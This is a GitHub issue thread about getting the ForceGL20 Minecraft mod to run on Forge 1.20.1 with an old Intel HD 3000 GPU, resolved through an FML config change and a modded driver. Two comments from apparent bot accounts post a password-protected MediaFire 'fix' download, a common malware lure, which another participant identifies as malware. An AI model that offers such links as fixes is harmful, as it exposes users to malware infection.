### ISSUE TITLE
Does not seem to work w/ Forge 1.20.1 (Neither Prism or Modrinth loaders)

### ISSUE THREAD

**Issue by IntelMiner** [coredex-source/ForceGL20-1.2x#3]
Hi,

Trying to help a friend join our server. Has some ancient Intel HD 3000 chip on Windows 10 (64-bit)

Suggested to use Linux as it *does* [support OpenGL 3.3 at a hardware level](https://people.freedesktop.org/~imirkin/glxinfo/) under Mesa. User was not interested.

Found this mod. Ported our mod pack over to Forge (from Neoforge). Seems to work in testing on my local machine with an RTX 2080 Ti (though I lack an old enough Intel GPU to confirm this)

Stepping through the Prism logs (attached) it recognizes and checkmarks the `forcegl20` mod Jar file, indicating compatibility(?)

However it looks like during load it runs an OpenGL check, fails to detect "at least" OpenGL **_3.2_** and then exits. I don't see the forcegl20 mod loading at any point before it runs the check and then exits however

[forcegl20-pack-log.txt.txt](https://github.com/user-attachments/files/16823366/forcegl20-pack-log.txt.txt)

**Comment by IntelMiner** [comment]
Small addendum: Testing with the "Modrinth" launcher (on my end) does seem to at least *show* the forcegl20 mod being loaded extremely early

Have sent a Modrinth version of the pack to the user along with instructions. Will add Modrinth logs if it continues to not work

**Comment by IntelMiner** [comment]
Same error on Modrinth

[Modrinth logs.txt](https://github.com/user-attachments/files/16823439/Modrinth.logs.txt)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by IntelMiner** [comment]
Nice malware, bot account

@coredex-source can you flag the above comment in any way? Chrome immediately noped out of the Mediafire link, but it may be worth warning others

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by coredex-source** [comment]
This should not have been the case, can you just try loading the mod without the mods first, as the mod changes a lot about how gl rendering works it might be interfering with other mods, it that still does not work I'll see if I can do something.

**Comment by coredex-source** [comment]
> Nice malware, bot account
> 
> @coredex-source can you flag the above comment in any way? Chrome immediately noped out of the Mediafire link, but it may be worth warning others

There is no link ...

**Comment by coredex-source** [comment]
After studying the log I can see that the Java version caused an issue, try downgrading to Java 17 and updating to Java 22 and come back to me if the issue still does not get resolved .. also do try using it without mods.

**Comment by IntelMiner** [comment]
>There is no link ...

Looks like Github removed the bot accounts. Sorry for the confusion!

>After studying the log I can see that the Java version caused an issue, try downgrading to Java 17 and updating to Java 22 and come back to me if the issue still does not get resolved .. also do try using it without mods.

I think that error may be a red-herring. Per the [Prism launcher recommendation](https://prismlauncher.org/wiki/getting-started/installing-java/) we're using the "Eclipse [Adoptium](https://adoptium.net/)"  OpenJDK. This Java release does work for myself and other users

**Comment by coredex-source** [comment]
The java "distribution" is not the issue but the java "version" might be the issue here.

**Comment by IntelMiner** [comment]
New error. But still seems to not be loading

Attached both with and without other mods installed

[Java17-no-mods.txt](https://github.com/user-attachments/files/16830625/Java17-no-mods.txt)
[Java17-with-mods.txt](https://github.com/user-attachments/files/16830626/Java17-with-mods.txt)

**Comment by coredex-source** [comment]
According to the above reports the mod is not even being loaded, I can not provide much or rather any assistance if it does not even load.

**Comment by coredex-source** [comment]
Will close in 24 hours if there are no more queries. (Nvm I guess I might have fixed the issue)

**Comment by coredex-source** [comment]
I have changed a bit of stuff but the mod is now for 1.21.x only .. I will be building a >= 1.20.1 Forge file specifically for this issue.

**Comment by coredex-source** [comment]
@IntelMiner Here you go, this "should" fix the bug (It is not really a bug, it most probably is just an incompatible mod):
https://modrinth.com/mod/forcegl2.0-remapped/version/1.2.1+1.20.1+

**Comment by IntelMiner** [comment]
Apologies for the silence, have been busy on my end.

Will send the updated version to my friend and report back shortly

**Comment by IntelMiner** [comment]
[crashingstill.txt](https://github.com/user-attachments/files/16919840/crashingstill.txt)

Still no success unfortunately. OpenGL check seems to preempt the mod executing? 

I am wondering if it's an issue specific to the GLFW version shipped by 3rd party launchers. Is this mod tested against the Prism launcher, or just vanilla?

**Comment by IntelMiner** [comment]
Update: 

Have tested 

- Prism loader (crashes)
- Modrinth loader (crashes)
- Vanilla loader (crashes)

All three seem to currently fail to load the mod before starting the OpenGL check and fail out with the same "failed to find a valid GLFW profile" reported earlier

This is against both Forge and NeoForge 1.20.1 with no additional mods loaded. Using both the Minecraft Launcher supplied Java 17 and Prism's Eclipse Adoptium OpenJRE 21

**Comment by coredex-source** [comment]
Hmmm .. That should not have been the case but if it is then I can't be of much help as it is most probably due to how and when forge loads up the mod. If you could just test the fabric version to verify if my theory is true it would be great.

**Comment by IntelMiner** [comment]
I'm not sure if Fabric support would be helpful. The mods we're using seem to all be based around Forge/Neoforge rather than Fabric (Create and others). 

I have put an issue in over on the Neoforge github to get eyes on the problem from the developers there. Hopefully they can help provide a solution with their mod loader

https://github.com/neoforged/NeoForge/issues/1523

**Comment by Erdragh** [comment]
FML takes early control of the window to show the early loading screen. There's a config option to disable that (`earlyWindowControl` in the FML config). Have you tried it with that disabled?

**Comment by coredex-source** [comment]
Oh yeah why in the world did I forget about that.
EDIT: Just checked and verified that Forge does skip checking for GL versions before loading the mod when the option is enabled.

**Comment by coredex-source** [comment]
@Erdragh Just a quick question .. I do think that I can modify the fml.toml file directly through my mod using FMLClientSetupEvent or FMLCommonSetupEvent, just correct me if I am wrong here.
EDIT: or should I just ask the users to do it manually .. I don't think manual config editing will be a good idea for "normal" players.

**Comment by Erdragh** [comment]
I'm not an advanced modder or anything I just knew about the earlyWindowControl thing, but even if you were able to do that it'd still require a game restart. You'd probably have to ask on the Neo/Forge discord about this.

**Comment by coredex-source** [comment]
Okay thanks for the info :+1:

**Comment by coredex-source** [comment]
> FML takes early control of the window to show the early loading screen. There's a config option to disable that (`earlyWindowControl` in the FML config). Have you tried it with that disabled?

@IntelMiner Try this, on prism you can go to the mods page and click on view configs, then just edit the earlyWindowControl = true to be earlyWindowControl = false in the fml.toml file, you can just open it using notepad.

**Comment by coredex-source** [comment]
Okay I'll just have to add the above to the readme as it can't be done directly using a mod.

**Comment by IntelMiner** [comment]
Sorry for the delay. Finally heard back from the user. It looks like the override is getting set correctly (yay!) 

However it's now crashing out with what looks to be a rendering exception?

[RenderCrash.txt](https://github.com/user-attachments/files/16935335/RenderCrash.txt)

**Comment by coredex-source** [comment]
> Sorry for the delay. Finally heard back from the user. It looks like the override is getting set correctly (yay!)
> 
> However it's now crashing out with what looks to be a rendering exception?
> 
> [RenderCrash.txt](https://github.com/user-attachments/files/16935335/RenderCrash.txt)

Wow okay .. it seems like your friend's gpu driver is cooked

**Comment by coredex-source** [comment]
Try updating the driver .. and if it still does not work then blame windows and not me :)
You should really install linux mint on his system, I personally don't prefer anything less than arch but mint is pretty easy to use and it is what I used to use when I first started with linux.

(Now I use Arch btw) lol :\

**Comment by coredex-source** [comment]
https://www.reddit.com/r/lowendgaming/comments/1258usx/updated_win1011_drivers_for_intel_hd_3000/

**Comment by IntelMiner** [comment]
The user is in Brazil and I'm in the US, unfortunately. Otherwise I'd probably just give them an old office PC with a better GPU in it

As it stands I'll see if they're willing to attempt doing this custom Intel HD driver. But they may simply be out of luck

**Comment by coredex-source** [comment]
> The user is in Brazil and I'm in the US, unfortunately. Otherwise I'd probably just give them an old office PC with a better GPU in it
> 
> As it stands I'll see if they're willing to attempt doing this custom Intel HD driver. But they may simply be out of luck

Well, there's not much I can do as the latest log file clearly points to minecraft not even being able to use OpenGL2 which is a driver issue.. It should work with the custom driver installed.

**Comment by flydiscohuebr** [comment]
> https://www.reddit.com/r/lowendgaming/comments/1258usx/updated_win1011_drivers_for_intel_hd_3000/  
  
I confirm that this driver works (tested on HD 2000)
The game is only with fabric and forcegl20-1.2x, I have not tested it with other mods

![printdaprint](https://github.com/user-attachments/assets/e51eb8fc-4020-4035-bcea-12cf71a9d8a6)
![Sem título2](https://github.com/user-attachments/assets/5a611d0e-a217-4d85-a90b-03d6740dc555)

**Comment by coredex-source** [comment]
> > https://www.reddit.com/r/lowendgaming/comments/1258usx/updated_win1011_drivers_for_intel_hd_3000/
> 
> I confirm that this driver works (tested on HD 2000) The game is only with fabric and forcegl20-1.2x, I have not tested it with other mods
> 
> ![printdaprint](https://private-user-images.githubusercontent.com/109389214/366110566-e51eb8fc-4020-4035-bcea-12cf71a9d8a6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjU5ODMwMjMsIm5iZiI6MTcyNTk4MjcyMywicGF0aCI6Ii8xMDkzODkyMTQvMzY2MTEwNTY2LWU1MWViOGZjLTQwMjAtNDAzNS1iY2VhLTEyY2Y3MWE5ZDhhNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwOTEwJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDkxMFQxNTM4NDNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1hODU2OTYxY2Q5YjA4ZjM2N2ZhZGEzY2QyNTUyZWZjNzc0NThkMmE2ZmIyZDU3OWI5M2ZjZDI5Yjc1YjVlNWE5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.nRA1itr_XKnwz55BnbOqO5FVbEuG0myozW8uq9HOK1k) ![Sem título2](https://private-user-images.githubusercontent.com/109389214/366109064-5a611d0e-a217-4d85-a90b-03d6740dc555.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjU5ODMwMjMsIm5iZiI6MTcyNTk4MjcyMywicGF0aCI6Ii8xMDkzODkyMTQvMzY2MTA5MDY0LTVhNjExZDBlLWEyMTctNGQ4NS1hOTBiLTAzZDY3NDBkYzU1NS5qcGc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwOTEwJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDkxMFQxNTM4NDNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zMTBjMTNlODlhYjQyYmNkMDkyZjg3NWFjZDhhYmQ3NzBiZjZlMTVlZDc5MmEwZGQwMjg5N2M3Y2JhYTcxYzRkJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.Lfd5_eLbkneMa9lINYWoh_ZAcbUfy3k50xcI17eopGk)

Thank you for the confirmation I really appreciate it !

**Comment by coredex-source** [comment]
And that reminds me @IntelMiner Try loading the mod without other mods aswell

**Comment by IntelMiner** [comment]
Stepped the user through getting the modded driver running. ForceGL now works!

...Unfortunately they only get 7 FPS on it :( 

Told them that's the best they can hope for unless they switch to Linux. 

I'll go ahead and close this bug though. I appreciate all the help!
